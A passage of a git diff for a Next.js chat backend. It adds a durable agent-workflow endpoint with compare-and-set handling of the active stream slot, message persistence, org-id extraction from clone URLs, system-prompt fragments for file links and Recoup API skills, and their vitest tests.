+  it("returns action=resume when status is 'running'", async () => {
+    const stream = new ReadableStream();
+    mockRun("running", () => stream);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("resume");
+    if (result.action !== "resume") return;
+    expect(result.runId).toBe(RUN_ID);
+    expect(result.stream).toBe(stream);
+  });
+
+  it("returns action=resume when status is 'pending'", async () => {
+    mockRun("pending");
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("resume");
+  });
+
+  it("returns action=ready after CASing a completed run's stale id to null", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("ready");
+    expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null);
+  });
+
+  it("returns action=conflict when getRun throws (transient workflow API error)", async () => {
+    vi.mocked(getRun).mockImplementation(() => {
+      throw new Error("workflow API unreachable");
+    });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    // Critical: we do NOT clear the stream id on transient error.
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when status promise rejects", async () => {
+    // Build an already-rejected promise and pre-attach a no-op handler (below)
+    // so the unhandled-rejection watcher doesn't flag it before the SUT awaits.
+    const rejection: Promise<string> = (async () => {
+      throw new Error("status fetch failed");
+    })();
+    rejection.catch(() => {
+      /* no-op: marks the rejection as handled; the SUT still observes it */
+    });
+    vi.mocked(getRun).mockReturnValue({
+      status: rejection,
+      getReadable: () => new ReadableStream(),
+    } as never);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+  });
+
+  it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    // A DB error from the CAS-clear must not fall through to "ready".
+    expect(result.action).toBe("conflict");
+  });
+});
diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts
new file mode 100644
index 000000000..0a3191ea7
--- /dev/null
+++ b/lib/chat/agentCustomInstructions.ts
@@ -0,0 +1,9 @@
+import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks";
+import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt";
+
+/**
+ * Instruction text appended to every chat-workflow prompt, platform-wide.
+ * The individual prompt fragments are joined here (blank line between them)
+ * so the route and its tests import one constant instead of rebuilding it.
+ */
+export const agentCustomInstructions = `${assistantFileLinkPrompt}\n\n${recoupApiSkillPrompt}`;
diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts
new file mode 100644
index 000000000..b5bd9280f
--- /dev/null
+++ b/lib/chat/assistantFileLinks.ts
@@ -0,0 +1,28 @@
+const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file=";
+
+function normalizeWorkspaceFilePath(filePath: string): string {
+  return filePath.split("\\").join("/").trim();
+}
+
+/**
+ * Produce the in-app deep link the chat UI follows to open a workspace file.
+ *
+ * @param filePath - Repo-relative path of the file (e.g. `src/index.ts`).
+ * @returns The normalized path prefixed with `#workspace-file=`.
+ */
+export function buildWorkspaceFileHref(filePath: string): string {
+  return WORKSPACE_FILE_HREF_PREFIX + normalizeWorkspaceFilePath(filePath);
+}
+
+/**
+ * Prompt fragment instructing the assistant to render workspace file paths
+ * as clickable markdown links (one rule per line) in its chat messages.
+ */
+export const assistantFileLinkPrompt = [
+  "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:",
+  "- `[path/to/file.ts](" + buildWorkspaceFileHref("path/to/file.ts") + ")`",
+  "- Use the repo-relative file path as both the visible link text and the path inside the link.",
+  "- Whole-file links only for now. Do not include line numbers or ranges.",
+  "- Do not use this format for URLs or anything that is not a real workspace file path.",
+  "- If you are not sure of the exact file path, do not invent one.",
+].join("\n");
diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts
new file mode 100644
index 000000000..b3b218245
--- /dev/null
+++ b/lib/chat/compareAndSetChatActiveStreamId.ts
@@ -0,0 +1,49 @@
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+/**
+ * Outcome of a CAS attempt, shaped so callers must tell three cases apart:
+ *
+ *   - `{ ok: true, claimed: true }` — the row held the expected value and
+ *     was updated to `next`.
+ *   - `{ ok: true, claimed: false }` — no row matched the predicate (a race
+ *     was lost, or `active_stream_id` holds some other value).
+ *   - `{ ok: false, error }` — Supabase / network failure. Kept distinct from
+ *     "race lost" so callers don't answer with a misleading 409 when the DB
+ *     is actually unhealthy.
+ */
+export type CasChatActiveStreamIdResult =
+  | { ok: true; claimed: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Compare-and-set on `chats.active_stream_id`: writes `next` only when the
+ * column currently equals `expected`. Thin domain wrapper around the generic
+ * `updateChat` helper, so the CAS-on-active_stream_id concept lives in the
+ * chat domain rather than in the Supabase plumbing.
+ *
+ * `/api/chat/workflow` uses it to:
+ *   - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-<uuid>"`).
+ *   - Promote that placeholder to the real run id once the run has started.
+ *   - Release a stale slot from `reconcileExistingActiveStream`.
+ *
+ * @param chatId - Target chat id.
+ * @param expected - Value `active_stream_id` must currently hold (null means
+ *   the slot must be unset).
+ * @param next - Value to write (null releases the slot).
+ * @returns `ok: false` with the error on failure, else whether a row was updated.
+ */
+export async function compareAndSetChatActiveStreamId(
+  chatId: string,
+  expected: string | null,
+  next: string | null,
+): Promise<CasChatActiveStreamIdResult> {
+  const predicate = { id: chatId, where: { active_stream_id: expected } };
+  const patch = { active_stream_id: next };
+  const outcome = await updateChat(predicate, patch);
+
+  // An `error` key marks the failure variant of updateChat's result.
+  if (!("error" in outcome)) {
+    return { ok: true, claimed: outcome.rowsUpdated > 0 };
+  }
+  return { ok: false, error: outcome.error };
+}
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 137f699cb..dcaad8585 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -1,31 +1,56 @@
 import { NextRequest, NextResponse } from "next/server";
-import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { start, getRun } from "workflow/api";
 import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import generateUUID from "@/lib/uuid/generateUUID";
 
+const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
+
 /**
  * Handles POST /api/chat/workflow.
  *
- * Stub implementation: delegates auth + body validation to validateChatWorkflow,
- * verifies ownership of the referenced session + chat, confirms the session's
- * sandbox is active, then returns a hardcoded UIMessage stream with an
- * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
- * the agent loop is wired up in a follow-up PR — this stub exists so clients
- * can integrate against the contract documented at
- * /api-reference/chat/workflow.
+ * Wires the chat UI to a durable Vercel Workflow agent loop. Flow:
+ *
+ *   1. Validate auth + body (validateChatWorkflow).
+ *   2. Verify session + chat ownership; ensure the session has an active sandbox.
+ *   3. If a workflow is already running for this chat, resume / 409 via
+ *      maybeResumeChatStream (extracted for OCP).
+ *   4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using
+ *      a `pending-<uuid>` placeholder CAS. Closes the race window where two
+ *      concurrent requests could both call `start()` and bill the model
+ *      before one loses the CAS.
+ *   5. Refresh the session's lifecycle-activity timestamp + fire-and-forget
+ *      persist the latest user message.
+ *   6. start(runAgentWorkflow), then promote the placeholder to the real run
+ *      id with a second CAS; if that CAS fails, cancel the run and return 409.
+ *   7. Return the workflow's UIMessage stream with x-workflow-run-id header.
+ *
+ * If we lost the placeholder CAS in step 4, the slot is already held by
+ * another in-flight or pending request → 409 (no workflow was started, so
+ * nothing to cancel).
  *
- * @param request - The incoming NextRequest
- * @returns A streaming Response (200) or a NextResponse error.
+ * Tools/sandbox passing is intentionally not wired here yet — the follow-up
+ * PR ports the @open-harness/agent tool surface into api.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming 200 Response or a NextResponse error.
  */
 export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
   const validated = await validateChatWorkflow(request);
   if (validated instanceof NextResponse) return validated;
 
+  // Session + ownership + sandbox active
   const sessions = await selectSessions({ id: validated.sessionId });
   if (sessions === null) return errorResponse("Internal server error", 500);
   const session = sessions[0];
@@ -33,29 +58,84 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
   if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
 
+  // Chat + ownership
   const chats = await selectChats({ id: validated.chatId });
   const chat = chats[0];
   if (!chat || chat.session_id !== validated.sessionId) {
     return errorResponse("Chat not found", 404);
   }
 
-  const runId = `stub-${generateUUID()}`;
+  // Resume an in-flight workflow for this chat (or 409) before starting a new one.
+  const resumed = await maybeResumeChatStream(validated.chatId, chat.active_stream_id);
+  if (resumed) return resumed;
+
+  // Pre-claim the active_stream_id slot with a placeholder BEFORE starting
+  // the workflow. This closes the race where two requests both call start()
+  // and bill the model before one loses the CAS.
+  const placeholder = `pending-${generateUUID()}`;
+  const claimed = await compareAndSetChatActiveStreamId(validated.chatId, null, placeholder);
+  if (!claimed.ok) return errorResponse("Internal server error", 500);
+  if (!claimed.claimed) {
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
 
-  const stream = createUIMessageStream({
-    generateId: generateUUID,
-    execute: ({ writer }) => {
-      const id = generateUUID();
-      writer.write({ type: "text-start", id });
-      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
-      writer.write({ type: "text-end", id });
-    },
-  });
+  // We own the slot. Everything between the claim and a successful start()
+  // must release the placeholder on failure; otherwise the chat stays wedged
+  // on a `pending-…` id that no workflow run will ever clear (every later
+  // request would reconcile it to a 409).
+  const releasePlaceholder = async (): Promise<void> => {
+    try {
+      const released = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, null);
+      if (!released.ok) {
+        console.error("[handleChatWorkflowStream] placeholder release failed:", released.error);
+      }
+    } catch (error) {
+      console.error("[handleChatWorkflowStream] placeholder release threw:", error);
+    }
+  };
+
+  const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const startRun = async () => {
+    await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state));
+    void persistLatestUserMessage(validated.chatId, validated.messages as never);
+    return start(runAgentWorkflow, [
+      {
+        messages: validated.messages,
+        chatId: validated.chatId,
+        sessionId: validated.sessionId,
+        modelId,
+      },
+    ]);
+  };
+
+  let run: Awaited<ReturnType<typeof startRun>>;
+  try {
+    run = await startRun();
+  } catch (error) {
+    // Same failure surface as before (the error still propagates to the
+    // caller) — we only make sure the slot is not leaked first.
+    await releasePlaceholder();
+    throw error;
+  }
+
+  // Promote placeholder → real run id via CAS. If something asynchronously
+  // stole the slot (or the DB went down) we cancel the workflow we just
+  // started since another stream now owns the client.
+  const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId);
+  if (!promoted.ok || !promoted.claimed) {
+    try {
+      await getRun(run.runId).cancel();
+    } catch (error) {
+      console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error);
+    }
+    // A DB error (as opposed to a lost race) may have left our placeholder in
+    // place; clear it best-effort so the cancelled run does not block the chat.
+    if (!promoted.ok) await releasePlaceholder();
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
 
   return createUIMessageStreamResponse({
-    stream,
-    headers: {
-      ...getCorsHeaders(),
-      "x-workflow-run-id": runId,
-    },
+    stream: run.getReadable<UIMessageChunk>(),
+    headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId },
   });
 }
diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts
new file mode 100644
index 000000000..209113fbf
--- /dev/null
+++ b/lib/chat/maybeResumeChatStream.ts
@@ -0,0 +1,40 @@
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+
+/**
+ * Handles the "this chat already has an `active_stream_id`" branch of the
+ * POST /api/chat/workflow handler, based on what
+ * `reconcileExistingActiveStream` reports:
+ *
+ *   - no `activeStreamId`, or reconcile says "ready" → `null`; the handler
+ *     goes on to start a fresh workflow.
+ *   - "resume" → a streaming `Response` carrying the existing run's readable
+ *     and its id in the `x-workflow-run-id` header.
+ *   - "conflict" → a 409 error `Response`.
+ *
+ * Kept separate from the handler so that orchestration stays small and the
+ * resume-vs-conflict rules can evolve on their own.
+ */
+export async function maybeResumeChatStream(
+  chatId: string,
+  activeStreamId: string | null,
+): Promise<Response | null> {
+  // Nothing claims the slot — nothing to resume.
+  if (!activeStreamId) return null;
+
+  const outcome = await reconcileExistingActiveStream(chatId, activeStreamId);
+  switch (outcome.action) {
+    case "resume": {
+      const headers = { ...getCorsHeaders(), "x-workflow-run-id": outcome.runId };
+      const stream = outcome.stream as ReadableStream<UIMessageChunk>;
+      return createUIMessageStreamResponse({ stream, headers });
+    }
+    case "conflict":
+      return errorResponse("Another workflow is already running for this chat", 409);
+    default:
+      // "ready": the stale slot was cleared, so the caller starts a new workflow.
+      return null;
+  }
+}
diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts
new file mode 100644
index 000000000..73c06f5ef
--- /dev/null
+++ b/lib/chat/persistLatestUserMessage.ts
@@ -0,0 +1,84 @@
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+type TextPart = { type: "text"; text: string };
+type UserMessage = { id: string; role: string; parts: Array<TextPart | { type: string }> };
+
+const TITLE_MAX_LENGTH = 80;
+const TRUNCATION_SUFFIX = "…";
+const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length;
+
+/**
+ * Best-effort persistence of the newest user message from a chat-workflow
+ * request. Runs before `start(runAgentWorkflow, ...)` so that:
+ *
+ *   - The user message is already stored if the page is refreshed while the
+ *     workflow is still queued.
+ *   - The chat's `updated_at` moves forward before the workflow has produced
+ *     its first chunk.
+ *   - The chat title is derived from the first user message, capped at
+ *     `TITLE_MAX_LENGTH` characters including the truncation suffix.
+ *
+ * A title is only written when the stored row is the earliest message of the
+ * chat, not merely the only one, so a quick second message cannot retitle it.
+ * Every failure is caught and logged, never rethrown to the request path.
+ *
+ * @param chatId - The target chat.
+ * @param messages - The full message list from the request body.
+ */
+export async function persistLatestUserMessage(
+  chatId: string,
+  messages: UserMessage[],
+): Promise<void> {
+  try {
+    // Only a trailing user message is persisted here.
+    const newest = messages[messages.length - 1];
+    if (newest?.role !== "user") return;
+
+    const stored = await upsertChatMessage({
+      id: newest.id,
+      chat_id: chatId,
+      role: "user",
+      parts: newest as never,
+    });
+
+    // Stop on a DB error (already logged), on a duplicate (the first insert
+    // already drove these side effects), or when no row came back.
+    if (!stored.ok || stored.isDuplicate || stored.row === null) return;
+
+    const touchedAt = new Date().toISOString();
+    await updateChat({ id: chatId }, { updated_at: touchedAt });
+
+    // Title gate: is the row we just stored still the earliest message of the
+    // chat? A follow-up that landed before this query does not change which
+    // row is earliest, so we still title from this message; if this message
+    // landed second, a different id comes back first and we skip.
+    const firstRows = await selectChatMessages({
+      chatId,
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+
+    // Query error (null) or no rows — leave the title alone.
+    if (!firstRows || firstRows.length === 0) return;
+    if (firstRows[0]?.id !== stored.row.id) return;
+
+    // Concatenate the text parts; non-text parts contribute nothing.
+    const textChunks: string[] = [];
+    for (const part of newest.parts) {
+      if (part.type === "text") textChunks.push((part as TextPart).text);
+    }
+    const text = textChunks.join(" ").trim();
+    if (text.length === 0) return;
+
+    let title = text;
+    if (text.length > TITLE_MAX_LENGTH) {
+      title = `${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}`;
+    }
+    await updateChat({ id: chatId }, { title });
+  } catch (error) {
+    console.error("[persistLatestUserMessage] error:", error);
+  }
+}
diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts
new file mode 100644
index 000000000..4ab004493
--- /dev/null
+++ b/lib/chat/reconcileExistingActiveStream.ts
@@ -0,0 +1,56 @@
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+export type ReconcileResult =
+  | { action: "resume"; runId: string; stream: ReadableStream<unknown> }
+  | { action: "ready" }
+  | { action: "conflict" };
+
+const RUNNING_STATUSES = new Set(["running", "pending"]);
+
+/**
+ * Decides how a new chat-workflow request proceeds when the chat's
+ * `active_stream_id` is already populated.
+ *
+ *   - Run status is `running` or `pending` → `action: "resume"`, carrying the
+ *     run id and the existing run's readable for the caller to pipe back to
+ *     the client.
+ *   - Any other status AND our CAS clears the stale id → `action: "ready"`;
+ *     the caller starts a fresh workflow.
+ *   - **Everything else** (the workflow API throws or rejects, the CAS-clear
+ *     loses the race or reports a DB error) → `action: "conflict"`, which
+ *     surfaces upstream as a 409.
+ *
+ * Deliberately conservative: a failed status probe never clears the stored
+ * id, because doing so could let a duplicate run start. Unless the run is
+ * known to be finished, no new one is allowed; once the real run ends, a
+ * later request sees that, clears the slot, and unblocks the chat.
+ */
+export async function reconcileExistingActiveStream(
+  chatId: string,
+  activeStreamId: string,
+): Promise<ReconcileResult> {
+  // Status probe. A throw or rejection here is treated as transient, so the
+  // slot stays held rather than risking a duplicate run.
+  try {
+    const run = getRun(activeStreamId);
+    const runStatus: string = await run.status;
+    const isAlive = RUNNING_STATUSES.has(runStatus);
+    if (isAlive) {
+      return { action: "resume", runId: activeStreamId, stream: run.getReadable() };
+    }
+  } catch (probeError) {
+    console.error(
+      "[reconcileExistingActiveStream] getRun failed; treating as conflict:",
+      probeError,
+    );
+    return { action: "conflict" };
+  }
+
+  // The run is no longer alive: try to CAS the stale id back to null. Only
+  // a confirmed clear yields "ready"; a lost race or a DB error yields
+  // "conflict", so no duplicate workflow starts after a failed write.
+  const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null);
+  const slotFreed = cleared.ok && cleared.claimed;
+  return slotFreed ? { action: "ready" } : { action: "conflict" };
+}
diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts
new file mode 100644
index 000000000..93f4d2e39
--- /dev/null
+++ b/lib/chat/recoupApiSkillPrompt.ts
@@ -0,0 +1,11 @@
+/**
+ * Always-on nudge appended to the agent's system instructions. It steers
+ * questions about the user's Recoup account toward one of two skills:
+ * `artist-workspace` (the sandbox's filesystem tree, for inventory and
+ * create-artist scaffolding) or `recoup-api` (live data, scoped to
+ * `RECOUP_ORG_ID` when that env var is set). The goal is that the agent
+ * loads the right playbook instead of guessing endpoint paths or reading
+ * overloaded nouns like "tasks" as generic repo TODOs.
+ */
+export const recoupApiSkillPrompt =
+  'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.';
diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts
new file mode 100644
index 000000000..c38232c4c
--- /dev/null
+++ b/lib/recoupable/__tests__/extractOrgId.test.ts
@@ -0,0 +1,57 @@
+import { describe, it, expect } from "vitest";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+
+describe("extractOrgId", () => {
+  it("extracts the UUID tail from a full clone URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a",
+      ),
+    ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a");
+  });
+
+  it("strips a .git suffix before extracting", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("tolerates a trailing slash on the URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("accepts an already-extracted repo name", () => {
+    expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe(
+      "cebcc866-34c3-451c-8cd7-f63309acff0a",
+    );
+  });
+
+  it("lowercases an uppercase UUID", () => {
+    expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe(
+      "80263819-9dfd-4bbf-9371-60a6185122d6",
+    );
+  });
+
+  it("returns null for non-Recoupable clone URLs", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6",
+      ),
+    ).toBeNull();
+  });
+
+  it("returns null when the repo name has no UUID tail", () => {
+    expect(extractOrgId("org-rostrum-pacific")).toBeNull();
+  });
+
+  it("returns null for malformed strings", () => {
+    expect(extractOrgId("")).toBeNull();
+    expect(extractOrgId("not-a-url-or-repo")).toBeNull();
+  });
+});
diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts
new file mode 100644
index 000000000..ac30985c5
--- /dev/null
+++ b/lib/recoupable/extractOrgId.ts
@@ -0,0 +1,31 @@
+import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName";
+
+const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;
+
+/**
+ * Pulls the organization UUID out of a Recoupable org clone URL or repo
+ * name. Org repos are named `org-<slug>-<uuid>`, so the id is matched as a
+ * hyphen-prefixed UUID at the very end of the repo name (case-insensitive).
+ *
+ * The chat workflow handler uses this to derive `recoupOrgId` from the
+ * session's clone URL; the `recoup-api` skill then scopes its calls to that
+ * org, so sandbox agents see the sandbox's org rather than every org the
+ * user belongs to.
+ *
+ * @param cloneUrlOrRepoName - Either the full clone URL
+ *   (`https://github.com/recoupable/org-foo-<uuid>`) or the already-extracted
+ *   repo name (`org-foo-<uuid>`). Inputs starting with `http` are treated as URLs.
+ * @returns The lowercased UUID, or `null` for anything that doesn't match.
+ */
+export function extractOrgId(cloneUrlOrRepoName: string): string | null {
+  const isUrl = cloneUrlOrRepoName.startsWith("http");
+  const repoName = isUrl ? extractOrgRepoName(cloneUrlOrRepoName) : cloneUrlOrRepoName;
+
+  // Empty input, or extractOrgRepoName produced nothing usable.
+  if (!repoName) return null;
+
+  const uuidTail = UUID_TAIL_PATTERN.exec(repoName)?.[1];
+  if (uuidTail === undefined) return null;
+
+  return uuidTail.toLowerCase();
+}
diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
new file mode 100644
index 000000000..c973f24df
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
@@ -0,0 +1,58 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+
+const selectChain = vi.fn();
+const eqChain = vi.fn();
+const orderChain = vi.fn();
+const limitChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ select: selectChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Allow any number of chained .eq() / .order() / .limit() calls — they all
+  // return the same fluent builder.
+  const builder = { eq: eqChain, order: orderChain, limit: limitChain };
+  selectChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  orderChain.mockReturnValue(builder);
+  limitChain.mockReturnValue(builder);
+});
+
+describe("selectChatMessages", () => {
+  it("returns rows on success", async () => {
+    limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null });
+    const result = await selectChatMessages({
+      chatId: "c-1",
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+    expect(result).toEqual([{ id: "m-1" }]);
+    expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1");
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true });
+    expect(limitChain).toHaveBeenCalledWith(1);
+  });
+
+  it("returns null on Supabase error (so callers can distinguish from empty)", async () => {
+    // With no filters, the terminal call is on selectChain itself
+    selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await selectChatMessages({});
+    expect(result).toBeNull();
+  });
+
+  it("returns [] on no match", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    const result = await selectChatMessages({ chatId: "c-1", limit: 1 });
+    expect(result).toEqual([]);
+  });
+
+  it("applies desc ordering when requested", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 });
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false });
+  });
+});
diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
new file mode 100644
index 000000000..0ea559058
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+
+const upsertChain = vi.fn();
+const selectChain = vi.fn();
+const maybeSingleChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ upsert: upsertChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  upsertChain.mockReturnValue({ select: selectChain });
+  selectChain.mockReturnValue({ maybeSingle: maybeSingleChain });
+});
+
+const data = {
+  id: "msg-1",
+  chat_id: "chat-1",
+  role: "user" as const,
+  parts: [{ type: "text", text: "hi" }],
+};
+
+describe("upsertChatMessage", () => {
+  it("returns ok:true with the row and isDuplicate:false on new insert", async () => {
+    maybeSingleChain.mockResolvedValue({ data, error: null });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: data, isDuplicate: false });
+    expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true });
+  });
+
+  it("returns ok:true with isDuplicate:true when the id already existed", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: null });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: null, isDuplicate: true });
+  });
+
+  it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: false, error: "down" });
+  });
+});
